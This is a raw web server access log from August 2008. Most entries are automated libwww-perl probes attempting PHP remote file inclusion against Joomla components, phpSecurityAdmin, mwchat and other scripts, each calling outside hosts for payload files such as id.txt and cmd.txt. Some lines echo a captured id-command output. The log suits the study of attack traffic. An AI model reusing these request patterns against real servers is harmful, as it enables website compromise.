89.111.179.10 - - [07/Aug/2008:05:16:34 -0500] "GET //?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
89.111.179.10 - - [07/Aug/2008:05:16:36 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 94316 "-""libwww-perl/5.805"
89.111.176.90 - - [07/Aug/2008:05:16:36 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.111.176.90 - - [07/Aug/2008:05:16:36 -0500] "GET //?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
89.111.176.90 - - [07/Aug/2008:05:16:38 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 94316 "-""libwww-perl/5.805"
217.23.156.36 - - [07/Aug/2008:05:17:23 -0500] "GET //blog.php?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.23.156.36 - - [07/Aug/2008:05:17:23 -0500] "GET /logs//blog.php?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:17:35 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:17:35 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
66.79.163.110 - - [07/Aug/2008:05:19:31 -0500] "GET /logs/access_log.1214438400//include/write.php?dir=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.811"
66.79.163.110 - - [07/Aug/2008:05:19:31 -0500] "GET //include/write.php?dir=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
66.79.163.110 - - [07/Aug/2008:05:19:31 -0500] "GET /logs//include/write.php?dir=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
77.90.20.2 - - [07/Aug/2008:05:19:35 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:19:36 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
80.67.24.222 - - [07/Aug/2008:05:19:36 -0500] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.fireandrescueaustralia.com/tmp/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:05:19:37 -0500] "GET //inc/download_center_lite.inc.php?script_root=http://www.fireandrescueaustralia.com/tmp/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.808"
74.6.18.231 - - [07/Aug/2008:05:19:43 -0500] "GET /logs/access_log.1155168000 HTTP/1.0" 200 249287 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
77.90.20.2 - - [07/Aug/2008:05:19:48 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:19:48 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
69.57.154.47 - - [07/Aug/2008:05:20:06 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:05:20:07 -0500] "GET /errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:05:20:07 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:05:20:07 -0500] "GET /logs/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:05:20:07 -0500] "GET /errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:05:20:07 -0500] "GET /logs/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
77.90.20.2 - - [07/Aug/2008:05:20:11 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:20:11 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
69.57.154.47 - - [07/Aug/2008:05:20:46 -0500] "GET /logs/access_log.1212883200/http://www.evoevents.co.uk//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt??http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:05:20:46 -0500] "GET /http://www.evoevents.co.uk//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt??http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:05:20:46 -0500] "GET /logs/http://www.evoevents.co.uk//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt??http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
74.6.18.231 - - [07/Aug/2008:05:21:06 -0500] "GET /logs/access_log.1203379200 HTTP/1.0" 200 355700 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.57.154.47 - - [07/Aug/2008:05:22:38 -0500] "GET /logs/access_log.1213315200/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:05:22:40 -0500] "GET /logs/access_log.1213142400/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
77.90.20.2 - - [07/Aug/2008:05:22:41 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:22:41 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:22:42 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:22:42 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:22:42 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:22:42 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.57.154.47 - - [07/Aug/2008:05:22:42 -0500] "GET /logs/access_log.1213315200/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:05:22:44 -0500] "GET /logs/access_log.1213142400/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:05:23:07 -0500] "GET /logs/access_log.1213315200/http://www.evoevents.co.uk//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt??http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:05:23:09 -0500] "GET /logs/access_log.1213142400/http://www.evoevents.co.uk//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt??http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
87.106.191.163 - - [07/Aug/2008:05:23:32 -0500] "GET /logs//?path%5Bdocroot%5D=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 200 94316 "-""libwww-perl/5.805"
87.106.191.163 - - [07/Aug/2008:05:23:33 -0500] "GET //?path%5Bdocroot%5D=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:05:23:47 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:05:23:47 -0500] "GET //index.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:05:23:47 -0500] "GET /logs/access_log.1216598400//index.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.111.179.10 - - [07/Aug/2008:05:23:51 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 94316 "-""libwww-perl/5.805"
89.111.179.10 - - [07/Aug/2008:05:23:51 -0500] "GET //?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
89.111.176.90 - - [07/Aug/2008:05:23:55 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 94316 "-""libwww-perl/5.805"
89.111.176.90 - - [07/Aug/2008:05:23:55 -0500] "GET //?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
72.9.233.10 - - [07/Aug/2008:05:27:47 -0500] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
72.9.233.10 - - [07/Aug/2008:05:27:47 -0500] "GET /logs/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
213.133.102.211 - - [07/Aug/2008:05:29:37 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:05:29:37 -0500] "GET /logs/access_log.1210291200//phpsecurityadmin/include/logout.php?PSA_PATH=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:05:29:38 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:05:29:49 -0500] "GET /logs/access_log.1210204800//phpsecurityadmin/include/logout.php?PSA_PATH=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:05:30:17 -0500] "GET /logs/access_log.1214438400//phpsecurityadmin/include/logout.php?PSA_PATH=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:05:30:29 -0500] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.806"
72.9.233.10 - - [07/Aug/2008:05:39:55 -0500] "GET /?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
72.9.233.10 - - [07/Aug/2008:05:39:56 -0500] "GET /logs/?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 200 94311 "-""libwww-perl/5.810"
72.55.148.240 - - [07/Aug/2008:05:42:22 -0500] "GET /?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
72.55.148.240 - - [07/Aug/2008:05:42:22 -0500] "GET /logs/?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 200 94311 "-""libwww-perl/5.811"
74.6.18.231 - - [07/Aug/2008:05:43:30 -0500] "GET /tattoo/set4.htm HTTP/1.0" 200 1762 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
77.90.20.2 - - [07/Aug/2008:05:49:22 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:49:27 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:49:30 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:49:33 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:49:35 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:49:40 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
209.172.33.60 - - [07/Aug/2008:05:53:47 -0500] "GET /logs/access_log.1206230400//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
209.172.33.60 - - [07/Aug/2008:05:53:47 -0500] "GET //?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
209.172.33.60 - - [07/Aug/2008:05:53:47 -0500] "GET /logs//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.812"
72.9.233.10 - - [07/Aug/2008:05:54:05 -0500] "GET /logs//join.php?INCLUDE_FOLDER=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.9.233.10 - - [07/Aug/2008:05:54:05 -0500] "GET //join.php?INCLUDE_FOLDER=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.106.191.163 - - [07/Aug/2008:05:54:23 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.111.179.10 - - [07/Aug/2008:05:57:10 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
89.111.179.10 - - [07/Aug/2008:05:57:10 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.111.176.90 - - [07/Aug/2008:05:57:12 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
89.111.176.90 - - [07/Aug/2008:05:57:12 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
64.22.89.194 - - [07/Aug/2008:05:58:07 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
64.22.89.194 - - [07/Aug/2008:05:58:07 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:05:58:07 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:05:58:07 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
72.9.233.10 - - [07/Aug/2008:05:58:12 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.9.233.10 - - [07/Aug/2008:05:58:12 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.246.78.8 - - [07/Aug/2008:05:59:07 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.246.78.8 - - [07/Aug/2008:05:59:07 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.225.218.2 - - [07/Aug/2008:05:59:13 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
66.225.218.2 - - [07/Aug/2008:05:59:13 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.208.43.121 - - [07/Aug/2008:05:59:44 -0500] "GET /logs/access_log.1216598400//index.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:05:59:44 -0500] "GET //index.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:05:59:48 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.225.218.2 - - [07/Aug/2008:06:00:15 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
66.225.218.2 - - [07/Aug/2008:06:00:15 -0500] "GET //index.php?INCLUDE_FOLDER=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.148.240 - - [07/Aug/2008:06:00:23 -0500] "GET /logs//join.php?INCLUDE_FOLDER=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
72.55.148.240 - - [07/Aug/2008:06:00:23 -0500] "GET //join.php?INCLUDE_FOLDER=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
66.79.163.142 - - [07/Aug/2008:06:02:20 -0500] "GET /logs/!scanhttp://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
66.79.163.142 - - [07/Aug/2008:06:02:20 -0500] "GET /!scanhttp://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.811"
213.33.84.163 - - [07/Aug/2008:06:02:57 -0500] "GET /logs/!scanhttp://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
213.33.84.163 - - [07/Aug/2008:06:02:57 -0500] "GET /!scanhttp://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:06:03:24 -0500] "GET /logs/access_log.1216598400//index.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:06:03:27 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:06:03:27 -0500] "GET //index.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.225.218.2 - - [07/Aug/2008:06:04:04 -0500] "GET /logs//start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hcisolutions.com/css/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
66.225.218.2 - - [07/Aug/2008:06:04:04 -0500] "GET //start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hcisolutions.com/css/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
66.225.218.2 - - [07/Aug/2008:06:05:20 -0500] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.hcisolutions.com/css/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
66.225.218.2 - - [07/Aug/2008:06:05:21 -0500] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.hcisolutions.com/css/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
80.67.24.222 - - [07/Aug/2008:06:06:15 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:06:06:15 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.808"
69.94.120.198 - - [07/Aug/2008:06:06:23 -0500] "GET /logs/access_log.1213315200//convert/mvcw.php?step=1&vwar_root=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
69.94.120.198 - - [07/Aug/2008:06:06:23 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
69.94.120.198 - - [07/Aug/2008:06:06:23 -0500] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
66.225.218.2 - - [07/Aug/2008:06:06:24 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
66.225.218.2 - - [07/Aug/2008:06:06:24 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
89.111.176.90 - - [07/Aug/2008:06:07:02 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
89.111.176.90 - - [07/Aug/2008:06:07:02 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.111.179.10 - - [07/Aug/2008:06:07:08 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
89.111.179.10 - - [07/Aug/2008:06:07:09 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
85.10.140.162 - - [07/Aug/2008:06:10:26 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
85.10.140.162 - - [07/Aug/2008:06:10:26 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
209.25.195.24 - - [07/Aug/2008:06:10:58 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
209.25.195.24 - - [07/Aug/2008:06:10:58 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.18.151.242 - - [07/Aug/2008:06:11:07 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:06:11:07 -0500] "GET //config/dbutil.bck.php?confdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
217.133.215.166 - - [07/Aug/2008:06:11:14 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.133.215.166 - - [07/Aug/2008:06:11:15 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.10.140.162 - - [07/Aug/2008:06:12:49 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
85.10.140.162 - - [07/Aug/2008:06:12:50 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
85.214.28.190 - - [07/Aug/2008:06:12:56 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
85.214.28.190 - - [07/Aug/2008:06:12:57 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
59.188.5.164 - - [07/Aug/2008:06:15:21 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
59.188.5.164 - - [07/Aug/2008:06:15:22 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
